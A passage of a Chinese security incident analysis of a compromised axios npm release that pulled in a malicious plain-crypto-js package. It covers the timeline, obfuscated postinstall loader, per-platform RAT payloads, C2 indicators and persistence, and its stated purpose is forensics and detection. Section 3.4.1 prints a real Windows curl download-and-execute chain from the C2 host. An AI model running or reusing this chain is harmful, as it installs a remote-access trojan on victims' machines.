style="font-weight: bold;">2026-03-30 13:57</span>，发布plain-crypto-js@4.2.0（干净诱饵版本），用于建立发布历史与可信度；</span></p></li><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="ordered-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">2026-03-31 00:03:46</span>，恶意C2域名 sfrclak.com 完成注册；</span></p></li><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="ordered-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">2026-03-31 07:59</span>，发布plain-crypto-js@4.2.1（恶意版本，植入 postinstall 钩子）；</span></p></li><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="ordered-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">2026-03-31 08:21</span>，发布axios@1.14.1（主版本），自动依赖恶意包并注入 RAT（回连 sfrclak.com:8000）；</span></p></li><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="ordered-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">2026-03-31 09:00</span>，发布axios@0.30.4（0.x 分支版本），同样植入后门；</span></p></li><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="ordered-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">2026-03-31 10:35</span>，开发者社区及厂商开始大规模警报传播；</span></p></li><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="ordered-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">2026-03-31 11:15</span>，npm官方紧急下线两个恶意Axios版本；</span></p></li><li><div style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="ordered-list" data-mpa-md-action-id="$id"><p style="" data-mpa-md-content="t"><span leaf=""><span textstyle="" style="font-weight: bold;">2026-03-31 12:26</span>，npm为plain-crypto-js发布安全占位版本，阻断攻击链。</span></p></div></li></ol><div data-mpa-md-key="heading-1" style="margin-bottom: 16px;margin-top: 16px;"><div style="width: 100%;display: flex;justify-content: center;align-items: center;justify-content: flex-start;" data-mid=""><div style="text-align: left;" data-mid=""><p data-mpa-md-content="t" style="font-size: 18px;color: rgb(51, 51, 51);font-weight: bold;letter-spacing: 1px;text-align: left;" data-mid="" data-mpa-md-action-id="mneialsv41b"><span mpa-font-style="mneec5rg1evr" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">三、技术分析</span></span></span></p></div></div></div><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mneialsw1vm8"><span leaf="" style="font-variant: normal;text-transform: none;"><span textstyle="" style="color: rgb(190, 25, 31);">3.1 攻击手法概览</span></span></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialswk9z"><span mpa-font-style="mneec5rg1evr" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">初始访问</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：劫持npm维护者账号jasonsaayman，将联系邮箱修改为ifstap@proton.me（用于接收通知/找回/验证）。</span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialswhpl"><span mpa-font-style="mneec5rg1y42" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">执行</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：仅修改 package.json，注入“源码中未引用”的幽灵依赖plain-crypto-js@^4.2.1，并移除 prepare 脚本以降低构建阶段暴露。</span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsw20es"><span mpa-font-style="mneec5rg1tpl" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">持久化与自清理</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：postinstall执行混淆的setup.js，按平台下载payload，随后主动覆盖自身package.json为干净版本并删除临时痕迹。</span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsw7rf"><span mpa-font-style="mneec5rg1hsv" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">命令与控制（C2）</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：<a href="http://sfrclak.com:8000/6202033（IP：142.11.206.73），仅支持" target="_blank">http://sfrclak.com:8000/6202033（IP：142.11.206.73），仅支持</a> POST 请求，User-Agent 伪装为旧版 IE，约每 60 秒 beacon 通联。</span></span></span></span></span></p><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mneialswcog"><span style=""><span style="font-variant: normal;text-transform: none;" lang="EN-US"><span leaf=""><span textstyle="" style="color: rgb(190, 25, 31);">3.2 混淆技术（setup.js）分析</span></span></span></span></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mneialswtsa"><span style="" mpa-font-style="mneec5rggxa"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">setup.js 采用多层混淆（Base64 + 字符反转 + XOR 加密等），解混淆后可见 child_process、os、fs、http 等模块调用与平台判断逻辑，用于分发不同平台的后续载荷并执行落地。</span></span></span></span></p><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mneialsw15o5"><span style=""><span style="font-variant: normal;text-transform: none;" lang="EN-US"><span leaf=""><span textstyle="" style="color: rgb(190, 25, 31);">3.3 平台特定 Payload 行为概览</span></span></span></span></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mneialswmkk"><span style=""><span style="font-variant: normal;text-transform: none;" lang="EN-US"><span style="font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: pre-wrap;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;" data-pm-slice="0 0 []"><span leaf="">三个平台的荷载虽然用三种语言写的，但是在代码结构上几乎一模一样，疑似使用AI生成。</span></span></span></span></p><table style="width:523px;"><tbody><tr><td data-colwidth="94"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneg1q7j1x5j" data-mpa-action-id="mneg1q7j1sne" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">平台</span></p></div></td><td data-colwidth="143"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneg1sjk1g6c" data-mpa-action-id="mneg1sjk1xkd" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">典型部署位置</span></p></div></td><td data-colwidth="143"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneg1z5xt6q" data-mpa-action-id="mneg1z5xm2j" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">典型执行方式</span></p></div></td><td data-colwidth="143"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneg23l793j" data-mpa-action-id="mneg23l780s" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">主要行为</span></p></div></td></tr><tr><td data-colwidth="94"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneg2bo8sko" data-mpa-action-id="mneg2bo87ya" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">macOS</span></p></div></td><td data-colwidth="143"><p><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:
11.0pt;line-height:150%;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:AR-SA;" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">/Library/Caches/com.apple.act.mond</span></span></p></td><td data-colwidth="143"><p><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:
11.0pt;line-height:150%;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:AR-SA;" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">AppleScript → zsh</span></span></p></td><td data-colwidth="143"><p><span style="font-size:10.5pt;mso-bidi-font-size:11.0pt;line-height:150%;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:
Calibri;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;mso-bidi-language:AR-SA;" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">下载</span></span><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:11.0pt;line-height:150%;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-bidi-font-family:
&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;mso-bidi-language:AR-SA;"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;"> payload</span></span><span style="font-size:10.5pt;mso-bidi-font-size:11.0pt;line-height:150%;font-family:
宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:
&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;mso-bidi-language:AR-SA;"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">、清理临时目录、自删除</span></span></p></td></tr><tr><td data-colwidth="94"><div><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneg2erzuzx" data-mpa-action-id="mneg2erze16" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">Windows</span></p></div></td><td data-colwidth="143"><p><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:
11.0pt;line-height:150%;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:AR-SA;" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">%PROGRAMDATA%\wt.exe</span></span></p></td><td data-colwidth="143"><p><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:
11.0pt;line-height:150%;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:AR-SA;" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">VBScript → PowerShell</span></span></p></td><td data-colwidth="143"><p><span style="font-size:10.5pt;mso-bidi-font-size:11.0pt;line-height:150%;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:
Calibri;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;mso-bidi-language:AR-SA;" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">隐藏窗口执行、持久化、远控通联</span></span></p></td></tr><tr><td data-colwidth="94"><p data-mpa-md-key="text" style="font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneg2ihwi01" data-mpa-action-id="mneg2ihxv2e" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">Linux</span></p></td><td data-colwidth="143"><p><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:
11.0pt;line-height:150%;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:AR-SA;" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">/tmp/ld.py</span></span></p></td><td data-colwidth="143"><p><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:
11.0pt;line-height:150%;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:AR-SA;" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">nohup python3</span></span></p></td><td data-colwidth="143"><p><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:
11.0pt;line-height:150%;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-ansi-language:EN-US;mso-fareast-language:
EN-US;mso-bidi-language:AR-SA;" data-pm-slice="0 0 []"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">后台</span></span><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:11.0pt;line-height:150%;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:
minor-bidi;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:
AR-SA;"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;"> RAT</span></span><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:
11.0pt;line-height:150%;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-ansi-language:EN-US;mso-fareast-language:
EN-US;mso-bidi-language:AR-SA;"><span leaf="" style="color: rgb(51, 51, 51);font-size: 16px;">、痕迹擦除</span></span></p></td></tr></tbody></table><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mneialswmex"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><span textstyle="" style="color: rgb(190, 25, 31);">3.4 Windows PowerShell Payload分析</span></span></span></span></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mneialsxp3x"><span mpa-font-style="mneec5rg1d1t" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">本节对 Windows 阶段载荷（PowerShell 远控木马）的行为分析，用于支撑 </span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">已感染主机的取证、检测与响应</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">。</span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsx3wn"><span leaf=""><span textstyle="" style="font-weight: bold;">3.4.1 载荷拉取与执行链</span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mneialsx1d3r"><span style="" mpa-font-style="mneec5rgcx2"><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">攻击者将PowerShell解释器/二进制复制到 %PROGRAMDATA%\wt.exe，随后通过 curl 从 C2 拉取下一阶段 6202033.ps1 并以隐藏窗口方式执行。执行完成后删除临时脚本以降低取证可见性。</span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsx1aiy"><span mpa-font-style="mneec5rgtqb" style=""><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">关键命令（示例）</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：</span></span></span></span></span></span></p><div data-mpa-md-key="blockquote" style="margin-bottom: 16px;margin-top: 16px;" data-mpa-md-template="30004"><div style="width: 100%;" data-mid=""><div style="background: #F4F4F4;width: 100%;padding: 16px;border-left: 2.5px solid #d03739;" data-mid=""><p data-mpa-md-content="t" style="font-size: 16px;color: rgb(51, 51, 51);text-align: justify;" data-mid="" data-mpa-md-action-id="mneialsx1sgk"><span mpa-font-style="mneec5rg1qtf" style=""><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">curl </span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">-s</span></span></span></span></span></span><span mpa-font-style="mneec5rg1t8j" style=""><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">-X</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""> POST </span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">-d</span></span></span></span></span></span><span style="" mpa-font-style="mneec5rg1mpg"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#34;packages.npm.org/product1&#34;</span></span></span></span><span style="" mpa-font-style="mneec5rg1pxq"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#34;<a href="http://sfrclak.com:8000/6202033" target="_blank">http://sfrclak.com:8000/6202033</a>&#34;</span></span></span></span><span style="" mpa-font-style="mneec5rg1ofo"><span style=""><span style="font-weight: bold;font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span></span><span mpa-font-style="mneec5rgdjs" style=""><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">%</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">UserProfile</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">%</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">\AppData\Local\Temp\6202033.ps1&#34;</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""> \</span></span></span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span style="" mpa-font-style="mneec5rg15a3"><span style=""><span style="font-weight: bold;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span></span><span mpa-font-style="mneec5rgm93" style=""><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#34;C:\ProgramData\wt.exe&#34;</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""> -w hidden </span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">-ep</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""> bypass </span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">-file</span></span></span></span></span></span><span mpa-font-style="mneec5rg1kur" style=""><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">%</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">UserProfile</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">%</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">\AppData\Local\Temp\6202033.ps1&#34;</span></span></span></span></span></span><span mpa-font-style="mneec5rg1nun" style=""><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#34;<a href="http://sfrclak.com:8000/6202033" target="_blank">http://sfrclak.com:8000/6202033</a>&#34;</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""> \</span></span></span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><br/></span></span></span></span><span style="" mpa-font-style="mneec5rgxhf"><span style=""><span style="font-weight: bold;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span></span><span style="" mpa-font-style="mneec5rgt0q"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">del</span></span></span></span><span mpa-font-style="mneec5rg11j5" style=""><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">%</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">UserProfile</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">%</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">\AppData\Local\Temp\6202033.ps1&#34;</span></span></span></span></span></span><span style="" mpa-font-style="mneec5rg12xk"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">/f</span></span></span></span></p></div></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsyuh3"><span mpa-font-style="mneec5rg19e8" style=""><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">要点</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsytzt"><span mpa-font-style="mneec5rg2oa" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">C2 地址通过脚本参数传入（便于复用同一载荷投递不同节点）</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsy243w"><span mpa-font-style="mneec5rg1odi" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">-ep bypass 绕过PowerShell执行策略</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsy13yz"><span mpa-font-style="mneec5rgpy5" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">下载—执行—删除形成短链路落地</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsygrh"><span style="" mpa-font-style="mneec5rghgt"><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;" lang="EN-US"><span leaf=""><span textstyle="" style="font-weight: bold;">3.4.2 </span></span><span leaf=""><span textstyle="" style="font-weight: bold;">功能模块与关键行为</span></span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mneialsyt11"><span style="" mpa-font-style="mneec5rg1io3"><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">该PowerShell载荷为远控木马，核心能力包括：</span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsyhls"><span mpa-font-style="mneec5rgu4l" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">1) </span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">持续驻留</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：将PowerShell命令保存为批处理文件并写入注册表Run启动项实现自启动。</span></span></span></span></span></span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-align: center;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="font-family: Calibri;font-variant: normal;text-transform: none;height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img class="rich_pages wxw-img" data-aistatus="1" data-ratio="0.17873941674506114" style="width: 581.34px;height: 103.91px;background-color: transparent;" data-w="1063" src="https://wechat2rss.xlab.app/img-proxy/?k=fb42f2c4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKmcZ106HYsSeZOZqvPIkibG980Qp9HCGoXTgeSG0CL2aQmnngVa9RC6PluPYFM5iaX1P3m6vbyGNvwxqMI8QlhvEwCETuPAfYp0%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsy1ecw"><span mpa-font-style="mneec5rg1rgl" style=""><span style="font-variant: normal;text-transform: none;"><span 